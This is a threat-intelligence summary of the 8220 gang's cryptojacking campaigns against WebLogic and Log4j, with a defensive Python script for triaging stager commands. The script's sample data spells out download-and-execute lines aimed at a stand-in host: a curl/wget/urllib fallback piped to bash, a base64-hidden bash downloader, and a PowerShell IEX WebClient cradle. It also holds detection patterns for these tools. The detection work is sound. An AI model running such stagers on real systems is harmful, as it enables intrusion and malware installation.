Imperva Threat Research reports previously undocumented activity by the 8220 gang, which targets Windows and Linux web servers with evolving tactics to deploy cryptojacking malware, and provides details on attack vectors and IoCs from recent campaigns. The post recaps the CVEs the group has historically exploited (in Oracle WebLogic and Log4j, among others) and describes its gadget-chain techniques, cross-OS payload delivery, and mitigation guidance. #8220Gang #Imperva #AgentTesla #rhajk #nasqa #CVE-2020-14883 #OracleWebLogic
Keypoints
- The 8220 gang has been observed deploying malware on Windows and Linux web servers using evolving TTPs.
- Historical activity includes exploiting several well-known vulnerabilities (e.g., CVE-2017-3506 in Oracle WebLogic and CVE-2021-44228 in Log4j) to propagate malware.
- Recent activity shows gadget-chain techniques, including XML-based and Java-based exploitation paths that execute attacker-supplied commands on the target host.
- On Linux, the stager tries several download methods in turn (curl, wget, lwp-download, and Python urllib); the urllib call and a custom bash function are both base64-encoded.
- On Windows, a PowerShell command uses the .NET WebClient class to fetch and run a script; the Java-based chains check which OS they are running on and execute the matching command string.
- Infections deliver known malware variants (AgentTesla, rhajk, nasqa) via the downloaded payloads, and the group frequently reuses IoCs and IP addresses across campaigns.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploits CVEs in Oracle WebLogic/other apps to infect targets. “Most recently, Trend Micro disclosed evidence of the group leveraging the Oracle WebLogic vulnerability CVE-2017-3506 to infect targeted systems.”
- [T1105] Ingress Tool Transfer – Downloads second-phase files using multiple methods before execution. “The command used to target Linux hosts attempts to download one of a set of second phase files using a variety of different methods: cURL, wget, lwp-download and python urllib (base64 encoded), as well as a custom bash function that is also base64 encoded.”
- [T1059.004] Unix Shell – Linux-based download and execution chains via shell commands (curl, wget, etc.).
- [T1059.001] PowerShell – Windows hosts run a PowerShell command that uses the .NET WebClient to fetch and execute a script.
- [T1059] Command and Scripting Interpreter – Java-based gadget chain that determines the OS and executes the matching payload commands (ATT&CK has no Java sub-technique; T1059.007 is JavaScript, so the parent technique is used here). “The injected Java code first evaluates whether the OS is Windows or Linux, and then executes the appropriate command strings…”
- [T1027] Obfuscated/Compressed Files or Information – Base64-encoded payloads and functions used in the download/execute chain. “base64 encoded”
- [T1059.004] Unix Shell – XML-loaded variant of the gadget chain: the exploit loads an XML document that in turn invokes another chain to run shell commands on the target.
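The Linux fallback-downloader chain and the Windows WebClient cradle summarized above share a detectable shape: several fetch tools tried in sequence, a base64 layer hiding at least one of them, and a sink (pipe to sh, eval, IEX) that runs whatever was fetched. The following triage script is an added example, not code from the Imperva post or from the campaign itself; it peels base64 layers off a captured command line, reports the downloaders, URLs and hosts found in every layer, and flags the pattern. The sample command lines, the host 198.51.100.7 (a TEST-NET-2 address) and all file names are constructed for illustration.

```python
"""Triage of download-and-execute command lines shaped like the 8220 gang stagers.

Added example (not code from the Imperva post). Given a captured command line it
peels base64 layers, then reports downloaders, URLs and execution sinks from every
layer and flags the fallback-downloader pattern. All samples below are constructed;
198.51.100.7 is a TEST-NET-2 address, not an observed IoC.
"""
import base64
import binascii
import re
from urllib.parse import urlparse

# Downloaders named in the post, plus the PowerShell WebClient cradle used on Windows.
DOWNLOADERS = {
    "curl": re.compile(r"\bcurl\b"),
    "wget": re.compile(r"\bwget\b"),
    "lwp-download": re.compile(r"\blwp-download\b"),
    "python-urllib": re.compile(r"\burllib\b"),
    "powershell-webclient": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
}
# Ways the fetched content ends up executing.
EXEC_SINK_RE = re.compile(
    r"\|\s*(?:ba)?sh\b|\beval\b|\bIEX\b|Invoke-Expression|\bpython[0-9.]*\s+-c\b|chmod\s+\+x",
    re.I,
)
URL_RE = re.compile(r"https?://[^\s'\"()<>|;]+")
# A run of base64 alphabet long enough to be a payload rather than a flag or a path.
B64_RE = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_base64_blobs(text: str, max_depth: int = 3) -> list[str]:
    """Return printable text recovered from base64 blobs in `text`, recursing into
    each decoded layer. Runs that are not base64 (hex hashes, long tokens) fail
    strict validation or do not decode to text and are skipped."""
    found: list[str] = []
    for blob in B64_RE.findall(text):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue
        if not all(ch.isprintable() or ch in "\r\n\t" for ch in decoded):
            continue
        found.append(decoded)
        if max_depth > 1:
            found.extend(decode_base64_blobs(decoded, max_depth - 1))
    return found


def analyze_command(cmd: str) -> dict:
    """Classify one command line and pull IoC-grade strings out of every layer."""
    decoded = decode_base64_blobs(cmd)
    layers = [cmd, *decoded]
    downloaders = sorted({n for layer in layers for n, rx in DOWNLOADERS.items() if rx.search(layer)})
    urls = sorted({u for layer in layers for u in URL_RE.findall(layer)})
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    has_sink = any(EXEC_SINK_RE.search(layer) for layer in layers)
    # A downloader that only shows up after decoding was hidden on purpose.
    hidden_downloader = any(rx.search(d) for d in decoded for rx in DOWNLOADERS.values())
    suspicious = len(downloaders) >= 2 or (bool(downloaders) and has_sink) or hidden_downloader
    return {
        "suspicious": suspicious,
        "downloaders": downloaders,
        "urls": urls,
        "hosts": hosts,
        "exec_sink": has_sink,
        "decoded_layers": decoded,
    }


# --- Constructed samples: shape follows the post's description, every value is invented ---
_PY_STAGER = 'import urllib.request;exec(urllib.request.urlopen("http://198.51.100.7/x.py").read())'
_BASH_FN = 'dl(){ curl -fsSL "$1" -o "$2" || wget -q "$1" -O "$2"; }'


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


SAMPLE_COMMANDS = {
    "linux_fallback_chain": (
        "(curl -fsSL http://198.51.100.7/x.sh || wget -q -O - http://198.51.100.7/x.sh"
        " || lwp-download http://198.51.100.7/x.sh /tmp/.x"
        f" || python -c \"$(echo {_b64(_PY_STAGER)} | base64 -d)\") | bash"
    ),
    "linux_encoded_function": (
        f"eval \"$(echo {_b64(_BASH_FN)} | base64 -d)\"; dl http://198.51.100.7/x.sh /tmp/.x;"
        " chmod +x /tmp/.x; /tmp/.x"
    ),
    "windows_webclient": (
        "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://198.51.100.7/x.ps1')\""
    ),
    "benign_single_fetch": "curl -fsSL https://example.com/releases/tool.tar.gz -o /tmp/tool.tar.gz",
}

if __name__ == "__main__":
    for name, cmd in SAMPLE_COMMANDS.items():
        r = analyze_command(cmd)
        print(f"{name}: suspicious={r['suspicious']} downloaders={r['downloaders']} hosts={r['hosts']}")
```

Running the script over the four constructed samples flags the three stagers and leaves the single benign curl alone; the Python urllib fetch and the curl/wget pair inside the bash function only surface after the base64 layer is decoded, which is why the hosts and URLs are collected from every layer rather than from the visible command alone. Feed it process-creation or web-server command-injection logs and the `urls`/`hosts` fields become candidate IoCs to check against the post's list.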
Indicators of Compromise
- [URLs] IoCs context – example-url-1, example-url-2, and 2 more URLs
- [Source IP] IoCs context – example-ip-1, example-ip-2, and 2 more IPs
- [Malicious File Hash] IoCs context – hash1, hash2, and 2 more hashes
Read more: https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/